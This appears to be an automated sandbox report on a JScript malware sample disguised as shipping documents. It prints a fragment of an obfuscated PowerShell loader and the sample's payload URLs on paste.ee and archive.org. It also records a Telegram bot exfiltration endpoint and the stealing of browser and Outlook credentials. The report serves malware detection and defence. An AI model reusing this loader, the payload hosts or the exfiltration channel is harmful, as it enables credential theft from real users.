qbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakae0aywbjag4adabpahiazqapadsajabyaguaywbvag0azgbvahiadabsaguacwbzacaapqagaccapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apganadsajabuag8azabvagkazaagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajab1ag4aywbyaguayqb0agkadgblacaapqagacqabqbvag4abwb0ahiabwbwagkacwbtac4asqbuagqazqb4ae8azgaoacqacgblagmabwbtagyabwbyahqabablahmacwapadsajabiaguabgb6ag8adaboagkayqb6agkabgblahmaiaa9acaajabtag8abgbvahqacgbvahaaaqbzag0algbjag4azablahgatwbmacgajabuag8azabvagkazaapadsajab1ag4aywbyaguayqb0agkadgblacaalqbnaguaiaawacaalqbhag4azaagacqaygblag4aegbvahqaaabpageaegbpag4azqbzacaalqbnahqaiaakahuabgbjahiazqbhahqaaqb2aguaowakahuabgbjahiazqbhahqaaqb2aguaiaarad0aiaakahiazqbjag8abqbmag8acgb0agwazqbzahmalgbmaguabgbnahqaaaa7acqasabhahqaaabvahiaiaa9acaajabiaguabgb6ag8adaboagkayqb6agkabgblahmaiaatacaajab1ag4aywbyaguayqb0agkadgbladsajabyaguadgbvagwadqb0agkabwbuagkaegblagqaiaa9acaajabtag8abgbvahqacgbvahaaaqbzag0algbtahuaygbzahqacgbpag4azwaoacqadqbuagmacgblageadabpahyazqasacaajabiageadaboag8acgapadsajabtaguabqbvahiayqbiagwazqbuaguacwbzacaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakahiazqb2ag8abab1ahqaaqbvag4aaqb6aguazaapadsajabjahuabab0ahiayqb0aguaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqabqblag0abwbyageaygbsaguabgblahmacwapadsajabyaguacwbpahqadqbhahqazqbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqabqb1agwadabpagyababvahiabwb1ahmalaanaccalaanaccalaanaccalaanae0auwbcahuaaqbsagqajwasaccajwasaccajwasaccajwasaccajwasaccaqwa6afwavqbzaguacgbzafwauab1agiababpagmaxabeag8adwbuagwabwbhagqacwanacwajwbxahuazqbyahuababvahuacwbuaguacwbzaguacwanacwajwbqahmajwasaccajwasaccajwasaccaywblag4adabpag0azqb0ahiaaqbjaccalaanadiajwasaccajwapacka' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2507426885.0000000002959000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information32
                      Scripting                      		Valid Accounts1
                      Native API                      		32
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		13
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)3
                      Obfuscated Files or Information                      		Security Account Manager1
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell                      		Login HookLogin Hook1
                      DLL Side-Loading                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                      Virtualization/Sandbox Evasion                      		LSA Secrets31
                      Virtualization/Sandbox Evasion                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                      Process Injection                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1676212 Sample: Shipping Documents SI 694_pdf.js Startdate: 28/04/2025 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 paste.ee 2->28 30 7 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 18 other signatures 2->52 8 wscript.exe 1 1 2->8         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 26->48 50 Connects to a pastebin service (likely for C&C) 28->50 process4 dnsIp5 32 paste.ee 23.186.113.60, 443, 49685, 49686 KLAYER-GLOBALNL Reserved 8->32 54 System process connects to network (likely due to code injection or exploit) 8->54 56 JScript performs obfuscated calls to suspicious functions 8->56 58 Suspicious powershell command line found 8->58 60 3 other signatures 8->60 12 powershell.exe 14 15 8->12         started        signatures6 process7 dnsIp8 34 archive.org 207.241.224.2, 443, 49693 INTERNET-ARCHIVEUS United States 12->34 36 ia801700.us.archive.org 207.241.233.30, 443, 49694 INTERNET-ARCHIVEUS United States 12->36 62 Writes to foreign memory regions 12->62 64 Injects a PE file into a foreign processes 12->64 16 MSBuild.exe 15 2 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 22 checkip.dyndns.com 158.101.44.242, 49696, 80 ORACLE-BMC-31898US United States 16->22 24 reallyfreegeoip.org 104.21.112.1, 443, 49697 CLOUDFLARENETUS United States 16->24 38 Tries to steal Mail credentials (via file / registry access) 16->38 40 Tries to harvest and steal browser information (history, passwords, etc) 16->40 signatures12

                      Screenshots

                      Download Video

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Shipping Documents SI 694_pdf.js14%ReversingLabs
                      SAMPLE100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Download Network PCAP: filteredfull

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalse
                        		high
                        paste.ee
                        		23.186.113.60
                        		truefalse
                          		high
                          archive.org
                          		207.241.224.2
                          		truefalse
                            		high
                            ia801700.us.archive.org
                            		207.241.233.30
                            		truefalse
                              		high
                              reallyfreegeoip.org
                              		104.21.112.1
                              		truefalse
                                		high
                                pki-goog.l.google.com
                                		192.178.49.195
                                		truefalse
                                  		high
                                  checkip.dyndns.com
                                  		158.101.44.242
                                  		truefalse
                                    		high
                                    checkip.dyndns.org
                                    		unknown
                                    		unknownfalse
                                      		high
                                      c.pki.goog
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpgfalse
                                          		high
                                          http://c.pki.goog/r/r4.crlfalse
                                            		high
                                            http://paste.ee/d/fa7OMk20/0false
                                              		high
                                              https://archive.org/download/new_image_20250413/new_image.jpgfalse
                                                		high
                                                http://checkip.dyndns.org/false
                                                  		high
                                                  https://paste.ee/d/fa7OMk20/0false
                                                    		high
                                                    https://reallyfreegeoip.org/xml/173.244.56.186false
                                                      		high
                                                      https://paste.ee/d/xZVSQx4S/0false
                                                        		high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://paste.eepowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://archive.org/powershell.exe, 0000000A.00000002.1577845542.000001E8A9D3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://reallyfreegeoip.orgdMSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.com;powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://analytics.paste.eepowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://paste.eepowershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.orgMSBuild.exe, 0000000C.00000002.2507426885.0000000002876000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://archive.orgpowershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/173.244.56.186lMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://checkip.dyndns.comdMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.org/xml/173.244.56.186dMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://checkip.dyndns.org/qpowershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://reallyfreegeoip.orgMSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://checkip.dyndns.orgdMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://analytics.paste.ee;powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://reallyfreegeoip.orgMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdnjs.cloudflare.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://checkip.dyndns.comMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdnjs.cloudflare.com;powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://checkip.dyndns.org/dMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://secure.gravatar.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://themes.googleusercontent.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://api.telegram.org/bot-/sendDocument?chat_id=powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://ia801700.us.archive.orgpowershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
